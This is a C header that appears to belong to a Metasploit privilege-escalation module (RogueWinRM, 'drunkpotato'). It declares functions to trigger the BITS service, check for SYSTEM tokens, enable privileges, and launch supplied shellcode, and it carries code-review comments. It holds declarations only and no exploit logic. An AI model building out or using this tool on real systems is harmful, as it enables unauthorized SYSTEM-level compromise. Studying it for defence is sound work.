#pragma once
#include <wchar.h>
#include <assert.h>
/* Tag announced ahead of the definition that follows directly below. */
struct _THREAD_PARAMETERS;

/*
 * Pair of pointers grouped under the name THREAD_PARAMETERS. The name suggests
 * it is handed to a worker thread, but no thread entry point is declared in
 * this header -- confirm against the implementation file.
 *
 * NOTE(review): LocalNegotiator is not declared by <wchar.h> or <assert.h>,
 * the only headers included here, so every includer must declare it first.
 * NOTE(review): nothing here states who owns either pointer or how long the
 * pointees must stay valid; if the struct does cross a thread boundary, the
 * creator has to keep both alive until the consumer is done with them.
 * NOTE(review): the tag starts with an underscore followed by an upper-case
 * letter, a spelling ISO C reserves for the implementation; it is kept as-is
 * because other files may refer to it.
 */
typedef struct _THREAD_PARAMETERS
{
    char *winrm_port;            /* port as text -- presumably NUL-terminated; confirm */
    LocalNegotiator *negotiator; /* project type, defined outside this header */
} THREAD_PARAMETERS;
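/*
 * Result type of determineProcessLaunchingMethod(): which process-creation
 * route is usable for a given token.
 *
 * The enumerators carry no explicit values, so they are 0, 1 and 2 in the
 * order listed; code that stores or compares the raw integers relies on that
 * order.
 *
 * There is deliberately no separate `enum _createProcessMethod;` line ahead of
 * the definition: ISO C does not allow an enum tag to be referenced before its
 * enumerator list, so a forward declaration only compiles as a vendor
 * extension. The definition below is the sole declaration.
 *
 * NOTE(review): the per-enumerator meanings are inferred from the names only;
 * confirm them against the implementation.
 */
typedef enum _createProcessMethod
{
    WITH_TOKEN,  /* presumably the CreateProcessWithTokenW route -- confirm */
    AS_USER,     /* presumably the CreateProcessAsUser route -- confirm */
    UNAUTHORIZED /* presumably: neither route is permitted for the token -- confirm */
} createProcessMethod;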
/*
 * Prototypes for this module.
 *
 * NOTE(review): HANDLE, BOOL, LPCTSTR and PROCESS_INFORMATION are Windows SDK
 * types and this header includes no SDK header itself, so the includer must
 * pull them in first.
 * NOTE(review): every prototype except RunRogueWinRM() is `static`. In a
 * header that gives each including translation unit its own internal-linkage
 * declaration, which must be defined in that same unit or the compiler warns
 * about a static function that is declared but never defined. These
 * declarations would sit more naturally at the top of the one .c file that
 * defines them.
 */

/*
 * The only externally visible function declared here.
 * NOTE(review): the buffer is passed without a length, unlike
 * trigger_drunkpotato() below, so the callee cannot bound its reads from the
 * signature alone -- confirm how the size is established.
 */
int RunRogueWinRM(char *shellcode);

/*
 * Takes a buffer together with its explicit byte count.
 * NOTE(review): `pi` is passed by value, so the callee works on a copy and
 * nothing it writes into the structure is visible to the caller -- confirm
 * this is intended.
 */
static int trigger_drunkpotato(char *shellcode,
                               unsigned int shellcode_len,
                               PROCESS_INFORMATION pi);

/* Maps a token handle to one of the createProcessMethod values. */
static createProcessMethod determineProcessLaunchingMethod(HANDLE hToken);

/*
 * Presumably enables the named privilege on hToken and reports success as a
 * BOOL -- confirm against the definition.
 */
static BOOL EnablePriv(HANDLE hToken, LPCTSTR priv);

/*
 * Presumably a predicate on whether `tok` belongs to the SYSTEM account; the
 * int return convention is not visible from here -- confirm.
 */
static int IsTokenSystem(HANDLE tok);

/*
 * Presumably queries, respectively starts, the BITS service; both take no
 * arguments and return a BOOL -- confirm the semantics in the definitions.
 */
static BOOL isBitsRunning(void);
static BOOL triggerBits(void);

/*
 * Splits one input buffer into a port string, a process name, a payload
 * pointer and the payload length, all delivered through out-parameters.
 * NOTE(review): `process_name` is a caller-supplied wchar_t buffer with no
 * capacity argument, so the callee cannot check that the name fits -- confirm
 * the bound that callers and callee agree on.
 * NOTE(review): the function returns void, so malformed input cannot be
 * reported to the caller; it is also not stated whether the char** outputs
 * point into `metasploit_bulk_data` or at fresh allocations -- confirm
 * ownership before freeing either.
 */
static void extract_metasploit_data(char *metasploit_bulk_data,
                                    char **winrm_port_address,
                                    wchar_t *process_name,
                                    char **shellcode,
                                    unsigned int *shellcode_length);